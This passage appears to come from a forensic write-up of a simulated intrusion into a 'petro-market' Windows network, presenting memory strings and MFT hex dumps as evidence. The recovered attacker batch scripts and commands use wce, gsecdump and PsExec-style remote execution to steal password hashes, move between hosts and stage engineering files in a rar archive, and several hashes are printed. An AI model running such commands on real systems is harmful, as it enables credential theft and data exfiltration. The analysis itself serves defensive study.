                                                    0x820001e0 wc.exe                 1992   1032      1       27      0      0 2012-11-27 01:30:00                      
                                                    0x82004918 cmd.exe                1860    296      1       33      0      0 2012-11-27 01:42:52                      
                                                    0x8221d5a8 mdd.exe                 988   1860      1       24      0      0 2012-11-27 01:46:00

                                                    Volatility plugin dlllist shows our backdoor in pid 1032

                                                    0x10000000    0x1c000 c:\windows\system32\6to4ex.dll

                                                    Successful privilege escalation to sysbackup user via wce


                                                    148200795 C:\WINDOWS\webui>
                                                    148202516 v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
                                                    148202638 Use -h for help.
                                                    148202658 Changing NTLM credentials of current logon session (000003E7h) to:
                                                    148202726 Username: sysbackup
                                                    148202747 domain: current
                                                    148202764 LMHash: c2a3915df2ec79ee73108eb48073acb7
                                                    148202806 NTHash: e7a6f270f1ba562a90e2c133a95d2057
                                                    148202848 NTLM credentials successfully changed!
                                                    148202890 C:\WINDOWS\webui>

                                                    Attempts to run system1.bat against IIS-SARIYADH-03


                                                    442240521 Starting c:\windows\system1.bat on 172.16.223.47...
                                                    442240577 system1.bat exited on 172.16.223.47 with error code 1.


                                                    mft entry for system1.bat


                                                    0000300: 4649 4c45 3000 0300 d198 5a05 0000 0000  FILE0.....Z.....
                                                    0000310: 0400 0100 3800 0100 8801 0000 0004 0000  ....8...........
                                                    0000320: 0000 0000 0000 0000 0500 0000 f82e 0000  ................
                                                    0000330: 0900 0000 0000 0000 1000 0000 6000 0000  ............`...
                                                    0000340: 0000 0000 0000 0000 4800 0000 1800 0000  ........H.......
                                                    0000350: 512b 1191 36cc cd01 16df f33a 38cc cd01  Q+..6......:8...
                                                    0000360: 16df f33a 38cc cd01 16df f33a 38cc cd01  ...:8......:8...
                                                    0000370: 2000 0000 0000 0000 0000 0000 0000 0000   ...............
                                                    0000380: 0000 0000 1301 0000 0000 0000 0000 0000  ................
                                                    0000390: 0000 0000 0000 0000 3000 0000 7000 0000  ........0...p...
                                                    00003a0: 0000 0000 0000 0200 5800 0000 1800 0100  ........X.......
                                                    00003b0: 1c00 0000 0000 0100 512b 1191 36cc cd01  ........Q+..6...
                                                    00003c0: 512b 1191 36cc cd01 512b 1191 36cc cd01  Q+..6...Q+..6...
                                                    00003d0: 512b 1191 36cc cd01 0000 0000 0000 0000  Q+..6...........
                                                    00003e0: 0000 0000 0000 0000 2000 0000 0000 0000  ........ .......
                                                    00003f0: 0b03 7300 7900 7300 7400 6500 6d00 3100  ..s.y.s.t.e.m.1.
                                                    0000400: 2e00 6200 6100 7400 8000 0000 7800 0000  ..b.a.t.....x...
                                                    0000410: 0000 1800 0000 0400 5b00 0000 1800 0000  ........[.......
                                                    0000420: 4065 6368 6f20 6f66 660d 0a6d 6b64 6972  @echo off..mkdir
                                                    0000430: 2063 3a5c 7769 6e64 6f77 735c 7765 6275   c:\windows\webu
                                                    0000440: 690d 0a6e 6574 2073 6861 7265 207a 3d63  i..net share z=c
                                                    0000450: 3a5c 7769 6e64 6f77 735c 7765 6275 6920  :\windows\webui 
                                                    0000460: 2f47 5241 4e54 3a73 7973 6261 636b 7570  /GRANT:sysbackup
                                                    0000470: 2c46 554c 4c0d 0a0d 0a0d 0a6e 6669 6720  ,FULL......nfig 
                                                    0000480: ffff ffff 8279 4711 633a 5c77 696e 646f  .....yG.c:\windo
                                                    0000490: 7773 5c77 6562 7569 5c73 7973 7465 6d2e  ws\webui\system.
                                                    00004a0: 646c 6c0d 0a6e 6574 2073 6861 7265 203e  dll..net share >
                                                    00004b0: 3e20 633a 5c77 696e 646f 7773 5c77 6562  > c:\windows\web
                                                    00004c0: 7569 5c73 7973 7465 6d2e 646c 6c0d 0a6e  ui\system.dll..n
                                                    00004d0: 6574 2073 7461 7274 203e 3e20 633a 5c77  et start >> c:\w
                                                    00004e0: 696e 646f 7773 5c77 6562 7569 5c73 7973  indows\webui\sys
                                                    00004f0: 7465 6d2e 646c 6c0d 0a6e 6574 2076 6965  tem.dll..net vie
                                                    0000500: 7720 3e3e 2063 3a5c 7769 6e64 6f77 735c  w >> c:\windows\
                                                    0000510: 7765 6275 695c 7379 7374 656d 2e64 6c6c  webui\system.dll
                                                    0000520: 0d0a 0d0a 0000 0000 ffff ffff 8279 4711  .............yG.

                                                    system2.bat being executed against IIS-SARIYADH-03

                                                    \WINDOWS\System32\svchost.exe - ps \\172.16.223.47 -accepteula -c c:\windows\system2.bat

                                                    mft entry for system2.bat


                                                    0000340: 0000 0000 0000 0000 4649 4c45 3000 0300  ........FILE0...
                                                    0000350: 5632 5b05 0000 0000 0300 0100 3800 0100  V2[.........8...
                                                    0000360: 7001 0000 0004 0000 0000 0000 0000 0000  p...............
                                                    0000370: 0400 0000 fb2e 0000 0300 0000 0000 0000  ................
                                                    0000380: 1000 0000 6000 0000 0000 0000 0000 0000  ....`...........
                                                    0000390: 4800 0000 1800 0000 9016 789d 39cc cd01  H.........x.9...
                                                    00003a0: 98f9 4b02 3acc cd01 98f9 4b02 3acc cd01  ..K.:.....K.:...
                                                    00003b0: 98f9 4b02 3acc cd01 2000 0000 0000 0000  ..K.:... .......
                                                    00003c0: 0000 0000 0000 0000 0000 0000 1301 0000  ................
                                                    00003d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
                                                    00003e0: 3000 0000 7000 0000 0000 0000 0000 0200  0...p...........
                                                    00003f0: 5800 0000 1800 0100 831d 0000 0000 0200  X...............
                                                    0000400: 9016 789d 39cc cd01 9016 789d 39cc cd01  ..x.9.....x.9...
                                                    0000410: 9016 789d 39cc cd01 9016 789d 39cc cd01  ..x.9.....x.9...
                                                    0000420: 0000 0000 0000 0000 0000 0000 0000 0000  ................
                                                    0000430: 2000 0000 0000 0000 0b03 7300 7900 7300   .........s.y.s.
                                                    0000440: 7400 6500 6d00 3200 2e00 6200 6100 7400  t.e.m.2...b.a.t.
                                                    0000450: 8000 0000 6000 0000 0000 1800 0000 0300  ....`...........
                                                    0000460: 4500 0000 1800 0000 4065 6368 6f20 6f66  E.......@echo of
                                                    0000470: 660d 0a63 3a5c 7769 6e64 6f77 735c 7765  f..c:\windows\we
                                                    0000480: 6275 695c 6773 2e65 7865 202d 6120 3e3e  bui\gs.exe -a >>
                                                    0000490: 2063 3a5c 7769 6e64 6f77 735c 7765 6275   c:\windows\webu
                                                    00004a0: 695c 7376 6368 6f73 742e 646c 6c73 742e  i\svchost.dllst.
                                                    00004b0: ffff ffff 8279 4711 ffff ffff 8279 4711  .....yG

                                                    mft entry for system3.bat


                                                    0000380: 0000 0000 0000 0000 4649 4c45 3000 0300  ........FILE0...
                                                    0000390: 6356 5b05 0000 0000 0300 0100 3800 0100  cV[.........8...
                                                    00003a0: 6001 0000 0004 0000 0000 0000 0000 0000  `...............
                                                    00003b0: 0300 0000 fc2e 0000 0800 0000 0000 0000  ................
                                                    00003c0: 1000 0000 6000 0000 0000 0000 0000 0000  ....`...........
                                                    00003d0: 4800 0000 1800 0000 6783 2063 3acc cd01  H.......g. c:...
                                                    00003e0: c2e5 2263 3acc cd01 c2e5 2263 3acc cd01  .."c:....."c:...
                                                    00003f0: c2e5 2263 3acc cd01 2000 0000 0000 0000  .."c:... .......
                                                    0000400: 0000 0000 0000 0000 0000 0000 1301 0000  ................
                                                    0000410: 0000 0000 0000 0000 0000 0000 0000 0000  ................
                                                    0000420: 3000 0000 7000 0000 0000 0000 0000 0200  0...p...........
                                                    0000430: 5800 0000 1800 0100 831d 0000 0000 0200  X...............
                                                    0000440: 6783 2063 3acc cd01 6783 2063 3acc cd01  g. c:...g. c:...
                                                    0000450: 6783 2063 3acc cd01 6783 2063 3acc cd01  g. c:...g. c:...
                                                    0000460: 0000 0000 0000 0000 0000 0000 0000 0000  ................
                                                    0000470: 2000 0000 0000 0000 0b03 7300 7900 7300   .........s.y.s.
                                                    0000480: 7400 6500 6d00 3300 2e00 6200 6100 7400  t.e.m.3...b.a.t.
                                                    0000490: 8000 0000 5000 0000 0000 1800 0000 0100  ....P...........
                                                    00004a0: 3800 0000 1800 0000 4065 6368 6f20 6f66  8.......@echo of
                                                    00004b0: 6620 0d0a 6469 7220 2f53 2043 3a5c 2a2e  f ..dir /S C:\*.
                                                    00004c0: 6477 6720 3e20 633a 5c77 696e 646f 7773  dwg > c:\windows
                                                    00004d0: 5c77 6562 7569 5c68 7474 7073 2e64 6c6c  \webui\https.dll
                                                    00004e0: ffff ffff 8279 4711 0000 0000 0000 0000  .....yG.

                                                    system4.bat being executed against IIS-SARIYADH-03

                                                    480667072 ps \\172.16.223.47 -accepteula -c c:\windows\webui\system4.bat

                                                    mft entry for system4.bat


                                                    00003a0: 4649 4c45 3000 0300 afd8 5b05 0000 0000  FILE0.....[.....
                                                    00003b0: 0300 0100 3800 0100 b001 0000 0004 0000  ....8...........
                                                    00003c0: 0000 0000 0000 0000 0400 0000 fd2e 0000  ................
                                                    00003d0: 0700 0000 0000 0000 1000 0000 6000 0000  ............`...
                                                    00003e0: 0000 0000 0000 0000 4800 0000 1800 0000  ........H.......
                                                    00003f0: 655b c338 3bcc cd01 7011 e20f 3ccc cd01  e[.8;...p...<...
                                                    0000400: 7011 e20f 3ccc cd01 7011 e20f 3ccc cd01  p...<...p...<...
                                                    0000410: 2000 0000 0000 0000 0000 0000 0000 0000   ...............
                                                    0000420: 0000 0000 1301 0000 0000 0000 0000 0000  ................
                                                    0000430: 0000 0000 0000 0000 3000 0000 7000 0000  ........0...p...
                                                    0000440: 0000 0000 0000 0200 5800 0000 1800 0100  ........X.......
                                                    0000450: 831d 0000 0000 0200 655b c338 3bcc cd01  ........e[.8;...
                                                    0000460: 655b c338 3bcc cd01 655b c338 3bcc cd01  e[.8;...e[.8;...
                                                    0000470: 655b c338 3bcc cd01 0000 0000 0000 0000  e[.8;...........
                                                    0000480: 0000 0000 0000 0000 2000 0000 0000 0000  ........ .......
                                                    0000490: 0b03 7300 7900 7300 7400 6500 6d00 3400  ..s.y.s.t.e.m.4.
                                                    00004a0: 2e00 6200 6100 7400 8000 0000 a000 0000  ..b.a.t.........
                                                    00004b0: 0000 1800 0000 0300 8300 0000 1800 0000  ................
                                                    00004c0: 4065 6368 6f20 6f66 6620 0d0a 633a 5c77  @echo off ..c:\w
                                                    00004d0: 696e 646f 7773 5c77 6562 7569 5c72 612e  indows\webui\ra.
                                                    00004e0: 6578 6520 6120 2d68 7068 636c 6c6c 7364  exe a -hphclllsd
                                                    00004f0: 646c 7364 6964 646b 6c6c 6a68 202d 7220  dlsdiddklljh -r 
                                                    0000500: 633a 5c77 696e 646f 7773 5c77 6562 7569  c:\windows\webui
                                                    0000510: 5c6e 6574 7374 6174 2e64 6c6c 2022 433a  \netstat.dll "C:
                                                    0000520: 5c45 6e67 696e 6565 7269 6e67 5c44 6573  \Engineering\Des
                                                    0000530: 6967 6e73 5c50 756d 7073 2220 2d78 2a2e  igns\Pumps" -x*.
                                                    0000540: 646c 6cff 8279 4711 ffff ffff 8279 4711  dll..yG.

                                                    At1.job executing wc.exe

                                                    70379040 "At1.job" (wc.exe)
                                                    70379080      Started 11/27/2012 4:30:00 AM



                                                    system5.bat being executed against IIS-SARIYADH-03

                                                    426451324 \WINDOWS\System32\svchost.exe - ps \\172.16.223.47 -accepteula -c c:\windows\webui\system5.bat

                                                    mft entry for system5.bat


                                                    00002f0: 0000 0000 0000 4649 4c45 3000 0300 3d66  ......FILE0...=f
                                                    0000300: 5c05 0000 0000 0400 0100 3800 0100 8001  \.........8.....
                                                    0000310: 0000 0004 0000 0000 0000 0000 0000 0400  ................
                                                    0000320: 0000 fe2e 0000 0400 0000 0000 0000 1000  ................
                                                    0000330: 0000 6000 0000 0000 0000 0000 0000 4800  ..`...........H.
                                                    0000340: 0000 1800 0000 e589 9246 3dcc cd01 4288  .........F=...B.
                                                    0000350: ce79 3dcc cd01 4288 ce79 3dcc cd01 4288  .y=...B..y=...B.
                                                    0000360: ce79 3dcc cd01 2000 0000 0000 0000 0000  .y=... .........
                                                    0000370: 0000 0000 0000 0000 0000 1301 0000 0000  ................
                                                    0000380: 0000 0000 0000 0000 0000 0000 0000 3000  ..............0.
                                                    0000390: 0000 7000 0000 0000 0000 0000 0200 5800  ..p...........X.
                                                    00003a0: 0000 1800 0100 831d 0000 0000 0200 e589  ................
                                                    00003b0: 9246 3dcc cd01 e589 9246 3dcc cd01 e589  .F=......F=.....
                                                    00003c0: 9246 3dcc cd01 e589 9246 3dcc cd01 0000  .F=......F=.....
                                                    00003d0: 0000 0000 0000 0000 0000 0000 0000 2000  .............. .
                                                    00003e0: 0000 0000 0000 0b03 7300 7900 7300 7400  ........s.y.s.t.
                                                    00003f0: 6500 6d00 3500 2e00 6200 6100 7400 8000  e.m.5...b.a.t...
                                                    0000400: 0000 7000 0000 0000 1800 0000 0300 5800  ..p...........X.
                                                    0000410: 0000 1800 0000 4065 6368 6f20 6f66 660d  ......@echo off.
                                                    0000420: 0a63 6f70 7920 633a 5c77 696e 646f 7773  .copy c:\windows
                                                    0000430: 5c77 6562 7569 5c77 632e 6578 6520 633a  \webui\wc.exe c:
                                                    0000440: 5c77 696e 646f 7773 5c73 7973 7465 6d33  \windows\system3
                                                    0000450: 320d 0a61 7420 3034 3a33 3020 7763 2e65  2..at 04:30 wc.e
                                                    0000460: 7865 202d 6520 2d6f 2068 2e6f 7574 ffff  xe -e -o h.out..
                                                    0000470: ffff 8279 4711 0000 0000 0000 0000 0000  ...yG

                                                    mft entry for h.out


                                                    000260: 4649 4c45 3000 0300 e654 5d05 0000 0000  FILE0....T].....
                                                    0000270: 0500 0100 3800 0100 3002 0000 0004 0000  ....8...0.......
                                                    0000280: 0000 0000 0000 0000 0300 0000 022f 0000  ............./..
                                                    0000290: 0500 0000 0000 0000 1000 0000 6000 0000  ............`...
                                                    00002a0: 0000 0000 0000 0000 4800 0000 1800 0000  ........H.......
                                                    00002b0: 6168 88b7 3ecc cd01 6168 88b7 3ecc cd01  ah..>...ah..>...
                                                    00002c0: 6168 88b7 3ecc cd01 6168 88b7 3ecc cd01  ah..>...ah..>...
                                                    00002d0: 2000 0000 0000 0000 0000 0000 0000 0000   ...............
                                                    00002e0: 0000 0000 c806 0000 0000 0000 0000 0000  ................
                                                    00002f0: 0000 0000 0000 0000 3000 0000 6800 0000  ........0...h...
                                                    0000300: 0000 0000 0000 0200 4c00 0000 1800 0100  ........L.......
                                                    0000310: 1d00 0000 0000 0100 6168 88b7 3ecc cd01  ........ah..>...
                                                    0000320: 6168 88b7 3ecc cd01 6168 88b7 3ecc cd01  ah..>...ah..>...
                                                    0000330: 6168 88b7 3ecc cd01 0000 0000 0000 0000  ah..>...........
                                                    0000340: 0000 0000 0000 0000 2000 0000 0000 0000  ........ .......
                                                    0000350: 0503 6800 2e00 6f00 7500 7400 0000 0000  ..h...o.u.t.....
                                                    0000360: 8000 0000 2801 0000 0000 1800 0000 0100  ....(...........
                                                    0000370: 0c01 0000 1800 0000 616d 6972 733a 5045  ........amirs:PE
                                                    0000380: 5452 4f2d 4d41 524b 4554 3a46 3243 3645  TRO-MARKET:F2C6E
                                                    0000390: 4644 3337 4231 3034 4344 3731 4439 3141  FD37B104CD71D91A
                                                    00003a0: 3038 3144 3442 3337 3836 313a 3734 3444  081D4B37861:744D
                                                    00003b0: 3041 3632 3737 3737 3642 3436 4634 4242  0A6277776B46F4BB
                                                    00003c0: 3744 3044 3732 3343 3545 4444 0d0a 464c  7D0D723C5EDD..FL
                                                    00003d0: 442d 5341 5249 5941 4448 2d34 3324 3a50  D-SARIYADH-43$:P
                                                    00003e0: 4554 524f 2d4d 4152 4b45 543a 3030 3030  ETRO-MARKET:0000
                                                    00003f0: 3030 3030 3030 3030 3030 3030 3030 3030  0000000000000000
                                                    0000400: 3030 3030 3030 3030 3030 3030 3a44 3332  000000000000:D32
                                                    0000410: 3341 3043 4243 3532 3037 3330 4237 3446  3A0CBC520730B74F
                                                    0000420: 4331 3839 3544 3533 3346 4534 330d 0a73  C1895D533FE43..s
                                                    0000430: 7973 6261 636b 7570 3a63 7572 7265 6e74  ysbackup:current
                                                    0000440: 3a43 3241 3339 3135 4446 3245 4337 3945  :C2A3915DF2EC79E
                                                    0000450: 4537 3331 3038 4542 3438 3037 3341 4342  E73108EB48073ACB
                                                    0000460: 373a 4537 4136 4632 3730 4631 4241 3536  7:E7A6F270F1BA56
                                                    0000470: 3241 3930 4532 4331 3333 4139 3544 3230  2A90E2C133A95D20
                                                    0000480: 3537 0d0a 0000 0000 ffff ffff 8279 4711  57...........yG.


                                                    mft entry for system6.bat


                                                    00002f0: 0000 0000 0000 4649 4c45 3000 0300 09a3  ......FILE0.....
                                                    0000300: 5a05 0000 0000 0300 0100 3800 0100 e001  Z.........8.....
                                                    0000310: 0000 0004 0000 0000 0000 0000 0000 0300  ................
                                                    0000320: 0000 fa2e 0000 0500 0000 0000 0000 1000  ................
                                                    0000330: 0000 6000 0000 0000 0000 0000 0000 4800  ..`...........H.
                                                    0000340: 0000 1800 0000 add9 9741 38cc cd01 add9  .........A8.....
                                                    0000350: 9741 38cc cd01 add9 9741 38cc cd01 add9  .A8......A8.....
                                                    0000360: 9741 38cc cd01 2000 0000 0000 0000 0000  .A8... .........
                                                    0000370: 0000 0000 0000 0000 0000 1301 0000 0000  ................
                                                    0000380: 0000 0000 0000 0000 0000 0000 0000 3000  ..............0.
                                                    0000390: 0000 7000 0000 0000 0000 0000 0200 5800  ..p...........X.
                                                    00003a0: 0000 1800 0100 1c00 0000 0000 0100 add9  ................
                                                    00003b0: 9741 38cc cd01 add9 9741 38cc cd01 add9  .A8......A8.....
                                                    00003c0: 9741 38cc cd01 add9 9741 38cc cd01 0000  .A8......A8.....
                                                    00003d0: 0000 0000 0000 0000 0000 0000 0000 2000  .............. .
                                                    00003e0: 0000 0000 0000 0b03 7300 7900 7300 7400  ........s.y.s.t.
                                                    00003f0: 6500 6d00 3600 2e00 6200 6100 7400 8000  e.m.6...b.a.t...
                                                    0000400: 0000 d000 0000 0000 1800 0000 0100 b800  ................
                                                    0000410: 0000 1800 0000 4065 6368 6f20 6f66 660d  ......@echo off.
                                                    0000420: 0a69 7063 6f6e 6669 6720 2f61 6c6c 203e  .ipconfig /all >
                                                    0000430: 3e20 633a 5c77 696e 646f 7773 5c77 6562  > c:\windows\web
                                                    0000440: 7569 5c73 7973 7465 6d2e 646c 6c0d 0a6e  ui\system.dll..n
                                                    0000450: 6574 2073 6861 7265 203e 3e20 633a 5c77  et share >> c:\w
                                                    0000460: 696e 646f 7773 5c77 6562 7569 5c73 7973  indows\webui\sys
                                                    0000470: 7465 6d2e 646c 6c0d 0a6e 6574 2073 7461  tem.dll..net sta
                                                    0000480: 7274 203e 3e20 633a 5c77 696e 646f 7773  rt >> c:\windows
                                                    0000490: 5c77 6562 7569 5c73 7973 7465 6d2e 646c  \webui\system.dl
                                                    00004a0: 6c0d 0a6e 6574 2076 6965 7720 3e3e 2063  l..net view >> c
                                                    00004b0: 3a5c 7769 6e64 6f77 735c 7765 6275 695c  :\windows\webui\
                                                    00004c0: 7379 7374 656d 2e64 6c6c 0d0a 0d0a ffff  system.dll......
                                                    00004d0: ffff 8279 4711 0000 0000 0000 0000 0000  ...yG.

                                                    gsecdump command found 

                                                    261942659 c:\windows\webui\gsecdump.exe -a >> c:\windows\webui\svchost.dll






                                                    Data collected from host script

                                                    365846531 Windows IP Configuration
                                                     365846561         Host Name . . . . . . . . . . . . : fld-sariyadh-43
                                                     365846623         Primary Dns Suffix  . . . . . . . : petro-market.org
                                                     365846686         Node Type . . . . . . . . . . . . : Hybrid
                                                     365846739         IP Routing Enabled. . . . . . . . : No
                                                     365846788         WINS Proxy Enabled. . . . . . . . : No
                                                     365846837         DNS Suffix Search List. . . . . . : petro-market.org
                                                     365846903 Ethernet adapter Local Area Connection:
                                                     365846948         Connection-specific DNS Suffix  . :
                                                     365846995         Description . . . . . . . . . . . : AMD PCNET Family PCI Ethernet Adapter
                                                     365847079         Physical Address. . . . . . . . . : 00-0C-29-A7-7C-6E
                                                     365847143         Dhcp Enabled. . . . . . . . . . . : No
                                                     365847192         IP Address. . . . . . . . . . . . : 172.16.223.187
                                                     365847253         Subnet Mask . . . . . . . . . . . : 255.255.255.0
                                                     365847313         Default Gateway . . . . . . . . . : 172.16.223.8
                                                     365847372         DNS Servers . . . . . . . . . . . : 172.16.150.10
                                                     365847432         Primary WINS Server . . . . . . . : 172.16.223.47
                                                     365847492 Server Name            Remark
                                                     365847525 -------------------------------------------------------------------------------
                                                     365847606 \\DC-USTXHOU
                                                     365847687 \\ENG-USTXHOU-148
                                                     365847768 \\FLD-SARIYADH-43
                                                     365847849 \\IIS-SARIYADH-03
                                                     365847930 The command completed successfully.
                                                     365847969 Alias name     administrators
                                                     365848000 Comment        Administrators have complete and unrestricted access to the computer/domain
                                                     365848094 Members
                                                     365848105 -------------------------------------------------------------------------------
                                                     365848186 Administrator
                                                     365848201 Amir
                                                     365848207 PETRO-MARKET\amirs
                                                     365848227 PETRO-MARKET\Domain Admins
                                                     365848255 sysbackup
                                                     365848266 The command completed successfully.
                                                     365848305 There are no entries in the list.
                                                     365848344 Share name   Resource                        Remark
                                                     365848399 -------------------------------------------------------------------------------
                                                     365848480 ADMIN$       C:\WINDOWS                      Remote Admin
                                                     365848561 C$           C:\                             Default share
                                                     365848642 IPC$                                         Remote IPC
                                                     365848723 The command completed successfully.
                                                     365848762 These Windows services are started:
                                                     365848801    Application Layer Gateway Service
                                                     365848839    Automatic Updates
                                                     365848861    COM+ Event System
                                                     365848883    Computer Browser
                                                     365848904    Cryptographic Services
                                                     365848931    DCOM Server Process Launcher
                                                     365848964    DHCP Client
                                                     365848980    Distributed Link Tracking Client
                                                     365849017    DNS Client
                                                     365849032    Error Reporting Service
                                                     365849060    Event Log

                                                    365849060    Event Log
                                                     365849074    Help and Support
                                                     365849095    IPSEC Services
                                                     365849114    Logical Disk Manager
                                                     365849139    Microsoft Device Manager
                                                     365849168    Net Logon
                                                     365849182    Network Connections
                                                     365849206    Network Location Awareness (NLA)
                                                     365849243    Plug and Play
                                                     365849261    Print Spooler
                                                     365849279    Protected Storage
                                                     365849301    Remote Access Connection Manager
                                                     365849338    Remote Procedure Call (RPC)
                                                     365849370    Remote Registry
                                                     365849390    Secondary Logon
                                                     365849410    Security Accounts Manager
                                                     365849440    Server
                                                     365849451    Shell Hardware Detection
                                                     365849480    SSDP Discovery Service
                                                     365849507    System Event Notification
                                                     365849537    System Restore Service
                                                     365849564    Task Scheduler
                                                     365849583    TCP/IP NetBIOS Helper
                                                     365849609    Telephony
                                                     365849623    Terminal Services
                                                     365849645    Themes
                                                     365849656    WebClient
                                                     365849670    Windows Audio
                                                     365849688    Windows Firewall/Internet Connection Sharing (ICS)
                                                     365849743    Windows Management Instrumentation
                                                     365849782    Windows Time
                                                     365849799    Wireless Zero Configuration
                                                     365849831    Workstation
                                                     365849849 The command completed successfully.
                                                     365849888 Scan of 254 IPs started at Tue Nov 27 03:22:59 2012
                                                     365849943 -------------------------------------------------------------------------------
                                                     365850024 172.16.223.8
                                                     365850038 Responded in 0 ms.
                                                     365850058 0 hops away
                                                     365850071 Responds with ICMP unreachable: No
                                                     365850107 TCP ports: 21 80
                                                     365850129 TCP 21:
                                                     365850138 [220 (vsFTPd 2.3.0)]
                                                     365850162 TCP 80:
                                                     365850171 [HTTP/1.1 200 OK Date: Tue, 27 Nov 2012 00:23:08 GMT Server: Apache/2.2.16 (Ubuntu) Last-Modified: Fri, 23 Nov 2012 15:06:45 GMT ETag: "2194f-b1-4cf2aee9810d2]
                                                     365850334 -------------------------------------------------------------------------------
                                                     365850415 172.16.223.47
                                                     365850430 Responded in 0 ms.
                                                     365850450 0 hops away
                                                     365850463 Responds with ICMP unreachable: No
                                                     365850499 TCP ports: 80 445
                                                     365850522 TCP 80:


                                                    365850531 [HTTP/1.1 200 OK Content-Length: 1433 Content-Type: text/html Content-Location: http://172.16